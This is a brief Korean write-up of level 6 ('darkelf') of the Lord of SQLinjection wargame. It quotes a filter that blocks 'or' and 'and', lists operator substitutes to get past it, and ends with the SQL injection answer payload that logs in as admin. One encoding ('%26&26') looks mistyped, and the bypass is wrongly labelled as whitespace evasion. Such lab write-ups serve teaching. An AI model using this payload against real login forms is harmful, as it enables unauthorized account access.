Lord of Sqlinjection - 6번 DARKELF

Lord of Sqlinjection - 6번 darkelf

6번 문제는 정규표현식으로 or, and 를 필터링 합니다.

=> if(pref_match('/or|and/i', $_GET[pw])) exit("HeHe");

 

SQL Injection 공격시 공백 문자 필터링 우회 방법

and => %26&26, &&

or => %7c%7c, ||

 

* 크롬 테스트 시, && 문자가 적용이 안되는 경우가 있습니다. 이때 %26%26으로 테스트 하시면 정상 적용가능합니다.

 

대체문자를 이용해서 or, and 필터링을 우회하면 됩니다.

 

*** 정답 ***

정답 : ?pw=' || id='admin'%23